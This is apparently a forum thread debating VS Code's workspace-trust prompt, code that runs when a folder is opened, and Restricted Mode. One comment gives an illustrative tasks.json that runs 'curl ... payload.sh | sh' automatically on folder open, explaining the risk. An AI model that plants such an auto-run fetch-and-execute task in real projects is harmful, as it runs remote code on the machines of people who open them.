Every time you open a new folder in VS Code, you get asked whether you trust it. Everyone probably just says yes, but it's not as if VS Code doesn't tell you that opening untrusted folders is dangerous.
Until this post it wasn't clear to me that just opening and trusting a directory can cause code to run, without taking any other explicit action that seems like it might involve running code, such as running tests. My bad, but still!
mjdv : > it wasn't clear to me that just opening and trusting a directory
andy_ppp : >obviously I wasn’t explicit enough in explaining I’m talking about code execution simply by opening a directory.
Understandably, there's a disconnect in the mental model of what "opening a folder" can mean in VSCode.
In 99% of other software, folders and directories are purely for navigation and/or organization, and you must then take the extra step of clicking on a particular file (e.g. ".exe", ".py", ".sh") to do something dangerous.
Furthermore, in classic Visual Studio, solutions and projects are files such as ".sln" and ".vcxproj", or a "CMakeLists.txt" file.
In contrast, VSCode projects can be the folders themselves. Folders are not purely navigation. So "VSCode opening a folder" can act like "MS Excel opening a .xlsm file" that might have a (dangerous) macro in it. A folder opened in VSCode may contain a "tasks.json" with dangerous commands in it.
Once your mental model groks the idea that a "folder" can carry the special semantic meaning of "project + tasks" in VSCode, the warning messages asking "Do you trust this folder?" make more sense.
VSCode uses "folders" instead of a top-level "file" as a semantic unit because it's more flexible for multiple languages.
To re-emphasize, Windows File Explorer or macOS Finder "opening a folder" do not run "tasks.json" so it is not the same behavior as VSCode opening a folder.
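To make the Excel-macro analogy concrete, here is a sketch of the kind of thing a malicious repo could ship in ".vscode/tasks.json". The "runOn": "folderOpen" option is a real tasks.json feature that (in a trusted folder, with automatic tasks allowed) runs the task as soon as the folder opens; the label, command, and URL below are illustrative placeholders, not taken from the article:

```json
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "innocent-looking project setup",
      "type": "shell",
      "command": "curl -s https://example.com/payload.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}
```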
Oh man! Microsoft was the #1 company with this problem for over 25 years and they still do it?
Word and Excel “MACROS” used to be THE main vector for kiddie viruses. Come on M$ … billions of dollars and you’re still loading up non-interactive code execution in all your documents that people expect to be POD (Plain Old Data)?
Is it so much to ask for your software to AT LEAST warn people when it’s about to take a destructive action, and keep asking until the user allows that class of thing non-interactively ONLY FOR THAT SIGNED SOFTWARE?
VS Code does exactly that: it warns before loading this non-interactive code. It warns you loudly, with an ugly modal dialog, when you open a folder that is new to it, and suggests Restricted Mode. A lot of the arguments here relate to:
1) This loud warning is easy to ignore, despite how loud it is
2) This loud warning is easy to disable, which many desire to do because it is very loud
3) This loud warning makes it easy to build bad habits (continually clicking Allow and training yourself to only ever click Allow, instead of marking safe parent folders)
4) Restricted Mode sounds "too restricted" to be useful (though it isn't too restrictive and is very useful)
5) Restricted Mode is also loud to remind you that you are in it, so many users think it is too loud and never want to be in it (despite it being very useful)
Maybe I'm confused about what you mean, but I don't think there's a huge difference. Loading code is a dangerous action. VS Code is doing exactly what the video is talking about: it gives you a big popup window before doing a dangerous action (one that could violate your privacy, could be malware, could do things you don't expect).
We want to load code in Turing complete languages. We want complex build tools and test harnesses to load "just so", and those too are generally Turing complete and configured and written in Turing complete languages. Parsing code in a Turing complete language takes another Turing complete language, generally. (Most languages are self-hosted so parsing the code is an action in that same language.)
One of the most dangerous actions we know of is an ancient and inescapable "bug" in all Turing complete work: the Halting Problem. There is no general procedure to prove that an arbitrary program will complete, nor when it will complete, other than running it and waiting for it to complete, if it completes. Infinite loops are both the power granted to us by our tools and the potential downfall of them all; our responsibility to deal with them is in our hands, and math can't help us enough.
Loading code is a dangerous action. VS Code is doing the right thing in how it handles it. It's not the best user experience, and clearly not enough users understand the dangers inherent in "do you really want to run all your extensions in this folder?" the way people better understand "Do you want this application to have access to your precise location?" as a threat (and in both cases, apps do take advantage).
Some instructions are benign, e.g. adding two numbers or even dividing by zero.
Other instructions call APIs of the OS.
It is at these times that the user should be prompted interactively whether they want the action done, with full details of what the scope is, and asked every time until the user checks a box that says “continue allowing this action, on this scope, for THIS program”.
I think I see what you are asking: why isn't it more granular?
In VS Code the granular options exist, too. Restricted Mode is just a pseudo-profile with (almost) no Extensions loaded and a couple other settings disabled. You can use the VS Code profiles and workspace controls to set many other granular in-between states.
I think the fundamental disagreement I have with your perspective, which is sort of the decades-long "lesson of Windows and Office" (I'll circle back to that) and also one of the deepest, oldest theoretical concerns of Computer Science, is that there is unfortunately no such thing as "benign code". The Halting Problem, and its corollary the "Zero-Day Sandbox Exploit in the Universal Turing Machine", suggest that mathematically we have no real tools to determine what is actually benign versus what merely looks benign.
If you don't like the math theory side of that argument, then we can absolutely discuss the practical, too. We can start with the example you have given that even divide by zero can be benign. That's a pretty good example. We've designed computers so they don't halt and catch fire on a divide by zero, sure, but to do that we have things like stateful error registers and even processor interrupts to jump immediately to different code when a divide by zero happens. Other code could be relying on those error registers as well and may get to its own unexpected state. Interrupts and jumps can be taken advantage of to run code the original program never expected to run.
Little processor-level details like that add up, and you get giant messes like Spectre/Meltdown.
That's also just one low-level place to inject malware; you can do it in any programming language, anywhere in the stack. This is where VS Code is in an especially unenviable position: because it wants to be a development environment for all possible programming languages, it has just about no idea of the full breadth of languages you've configured to run through the Extensions you've installed and the CLI tasks it can automate. VS Code isn't your Operating System (it is not yet trying to be that, unlike Emacs), it doesn't sandbox your Extensions, and it doesn't limit what APIs the CLI build tools you have installed can call.
There are practical exploits of this directly in the article here, and more can be found with easy searching. Granularity only helps so much. A big, general, loud warning isn't the best experience, but it's the closest to the safest option available to VS Code (not just because it isn't your OS; even OSes aren't omniscient).
The safest option for VS Code really is "Don't autostart anything, it might be dangerous". Just as Windows has had to stop autorunning JScript and VBScript (once considered "benign"). Just as Windows has had to stop autorunning AUTORUN.INF instructions when a CD or USB disk is inserted (once considered "benign"). Just as Office has had to stop running VBA macros on startup (once considered benign). I wish VS Code took a couple more steps toward the Excel experience ("Protected Mode" sounds kinder than "Restricted Mode" — a subtle difference, but subtle differences matter; fewer flow-interrupting modals and more "quietly default to Protected Mode"), but the general principle here isn't in question in my mind.
Coming back to how deeply and disturbingly this is tied to some of the oldest theories and questions of Computer Science: it also seems useful to remind everyone that, if you want to feel truly paranoid, the only safe way to use a computer is to never use a computer. We don't know how to differentiate benign code from dangerous code, and we likely never will. Not your OS, not your code editor, not even the abstract Universal Turing Machine you are running with pencil and paper. Unless we find some left-field solution to the Halting Problem, we're kind of stuck with "Computers are inherently dangerous, proceed with caution".
I don't like the way it is handled. Imagine Excel actively prompting you with a popup every time you open a sheet: "Do you trust the authors of this file? If not, you will lose out on cool features and the sheet will run in restricted mode."
No it doesn't, because restricted mode without macros is the default, and it isn't framed as something bad or as losing out on all of those nice features.
Exactly, that's why I was making the comparison. It's not an in-your-face popup where users get used to just pressing the blue, highlighted, glowing "I trust the authors" button without even being told what features they'd miss out on.
The Protected view in Office instead tells you "Be careful" and to only activate editing when you need to.
It's also worth noting that this behavior evolved very slowly. It took Excel decades to learn how to best handle the defaults. Excel started with modals similar to VS Code's "Do you want to allow macros? This may be dangerous", found too many users self-trained on "Allow" as the only button that needed to be pressed and eventually built the current solution.
If VS Code is still on the same learning curve, hopefully it speeds up a bit.
Right, I think one of the biggest problems is the name "Restricted Mode" itself. It sounds like a punishment when it is actually a safer sandbox. Restricted Mode is great and incredibly useful. But it is unsurprising that people don't like to be in Restricted Mode when it sounds like a doghouse out back, not a lobby or atrium on the way into the rest of the building.
Sure, but as noted elsewhere, IDEs generally don't "do stuff" by default just on opening a folder. VSCode, by default, will run some programs as soon as you open a folder.
It's worded really badly. So VS Code is the thing that provides the dangerous features? No problem, I know and trust VS Code. What the message should be warning about is that the folder may contain dangerous code or configuration values that can execute upon opening, due to VS Code features that are enabled by default. That sounds worse for them, but it would be honest.
But you, as a security-conscious software developer, know that the phrase "may automatically execute files" can also mean "with malicious intent". The tradeoff that whoever wrote the text had to make (and since it's open source, it's likely been debated by a committee for ages) is conciseness vs. clarity. Give people too much text and they zone out, especially if their objective is "do this take-home exercise to get a job" rather than "open this project carefully to see if there are any security issues in it".
This problem goes back to, uh... Windows Vista. Its predecessors made all users admins; Vista added a security layer so that the more dangerous tasks required you to confirm. But they went overboard and prompted for almost anything, even changing your desktop background image, and very quickly people got numb to the notices and just hit 'OK' on everything.
Anyway. In this particular case, VS Code can be more granular and only show a popup when the user tries to run a task saying something like "By permitting this script to run you agree that it can do anything, this can be dangerous, before continuing I'm going to open this file so you can review what it's about to do" or whatever.
- ESLint, the most commonly used linter in the JavaScript ecosystem, uses a JavaScript file for configuration (eslint.config.mjs), so if you open a JS project and want your editor to show you warnings from the linter, an extension needs to run that JS
- In Elixir, project configuration is written in code (mix.exs), so if you open an Elixir project and want the language server to provide you with hints (errors, warnings and such), the language server needs to execute that code to get the project configuration. More generally it will probably want to expand macros in the project, which is also code execution.
- For many languages in general, in order to analyze code, editor extensions need to build the project, and this often results in code execution (like through macros or build scripts like build.rs, which I believe rust-analyzer executes)
Thanks! I think it would be better if these types of events were fine grained and you could decide if you wanted to run them the first time but I can understand them being enabled now.
More granular is more likely to train users on "Always Click Allow". The current modal dialog already has that problem, and it's just one O(N) dialog where N is the number of folders you open (modulo opt-outs). If you got O(N * M) of these, where N is the number of folders and M is the number of tasks in tasks.json plus the number of Extensions installed that want to activate in the folder, a) you would probably go a little batty, and b) you would probably stop reading them quickly and just always click Allow.
(It can also be pointed out that a lot of these are granular under the hood. In addition to Restricted Mode as a generally available sandbox, you have all sorts of workspace level controls over tasks.json and the Extensions you have installed and active for that workspace. Not to mention a robust multi-profile system where you can narrow Extensions to specific roles and moods. But most of us tend to want to fall into habits of having a "kitchen sink" profile with everything always available and don't want to think about granular security controls.)
When you open a folder in VS Code, addons can start to set up language servers to index the code in the folder. This usually involves invoking build systems.
(I think some people are fixating on the specific feature mentioned in the article. The reason this popup exists is that there are many ways this code execution could happen. Disabling this one feature doesn't make it safe, and even if this feature were absent, the same result could be achieved by abusing other capabilities that exist in the VS Code ecosystem.)
Makefiles etc. Many types of projects use arbitrary setup and build commands or can load arbitrary plugins, and unlike VS which imposes its own project format, VSC tries to be compatible with everything that people already use. Git hooks are another one.
Please see the reply to the other comment, obviously I wasn’t explicit enough in explaining I’m talking about code execution simply by opening a directory.
Some project types, such as Gradle or Maven projects, use arbitrary commands or plugins in project setup. You have to run arbitrary plugins to know which directories are the source directories, and you have to know which directories are the source directories to do anything in Java.
If you just want to see the files in the directory, then sure. But VS Code is an IDE. It's made for editing software projects which have more structure than that.
The grandparent is talking about code execution that can happen just by opening the directory. You're imagining, like I did (and the grandparent), that you have to run or execute something in VSC to get that to happen, and I'm asking what features could possibly require this. Obviously, with running tests or a makefile, everyone understands clearly that you're executing other people's code.
It's not even running tests. Test extensions usually have to run something just to populate the tests panel in the first place and provide the ability to run tests à la carte. Thus opening a folder will cause the test collector binary to run.
They could ask and/or parse the tests for the information rather than run them to output it. I’m honestly still not seeing a killer feature here that makes the security implications worth it!
The trouble is that "just parse the tests" isn't always an option and running arbitrary code is the nature of how software is built.
The easiest example is JS testing. Most test harnesses use a JS file for configuration. If you don't know how the harness is configured, how do you know you are parsing the right tests?
Most test frameworks in JS use the describe/it pattern: `describe("some test collection", () => it("some test", () => /* …test code… */))`. Tests are built as callbacks to functions.
In theory, sure, you could "just" try to RegEx out the `describe("name"` and `it("name"` patterns, but tracking nesting with RegEx alone is harder than it looks. Then you realize that because those are code callbacks, no one is stopped from building meta-test suites with things like `for (thing of someTextMatrix) { it(`handles ${thing}`, () => /* …parametric test on thing… */) }`.
The test language used most in JS is JS. It's a much harder problem than "just parsing". In most cases a test harness needs to run the JS files to collect the full information about the test suite. Being JS files, they are Turing complete and free to do whatever they want. Many times the test harnesses are running in a full Node environment with access to the entire filesystem and more.
Most of that applies to other test harnesses in other languages as well. To get the full suite of possible tests you need to be able to build that language and run it. How much of a sandbox that language has in that case shifts, but often it is still a sandbox with ways to escape. (We've proven that there's an escape Zero Day in the Universal Turing Machine, escapes are in some ways inevitable in any and all Turing Complete languages.)
Yeah, me as well. At least have untrusted mode allow certain plugins, or certain whitelisted features of plugins, to run. Not having vim keybindings or syntax highlighting is too barebones.
The message isn't very clear on what exactly is allowed to happen. Just intuitively, I wouldn't have expected simply opening a folder would "automatically execute tasks" because that's strange to me
>Code provides features that may automatically execute files...
What features? What files? "may"? So will it actually happen or is it just "well it possibly could"?
I've used it to open folders that I personally made and which don't have any tasks or files that get automatically executed, and yet the message pops up anyway.
It's like having an antivirus program that unconditionally flags every file as "this file may contain a virus"
> What features? What files? "may"? So will it actually happen or is it just "well it possibly could"?
How is Code supposed to know? It probably depends on the plugins you have installed.
> It's like having an antivirus program that unconditionally flags every file as "this file may contain a virus"
No, it’s like if your OS asks if you want to actually run the program you’re about to before running it the first time.
And it gives you the alternative to run it in a sandbox (which is equivalent to what happens when you don’t trust the workspace, then it still opens but in restricted mode)
Yeah, because there are a lot of mechanisms by which a folder may start to execute code when you open it outside of restricted mode. A large fraction of addons have something which could be used for this, for example. There isn't a general check that it can apply ahead of time for this.
(They could, with some breaking changes, maybe try to enforce a permissions system for the matrix of addons and folders, where it would ask for permission when an addon does actually try to run something, but this would result in a lot of permission requests for most repos)
They could also, with a breaking change, require addons to register what sorts of files they'll execute when a folder is opened in trusted mode. If no matching files are found, then opening the folder is safe and no prompt is needed. If matching files are found, prompt the user and replace "may" with "will". Fewer permission requests, and a clearer message.
People will still inevitably ignore the message and open everything in trusted mode, but it'd be more reasonable to consider that user error.
Thing is, when you open a webpage it's clear that it may automatically execute code (Javascript, WebAssembly). What needs to be clear (and by default limited) is the authority of that code.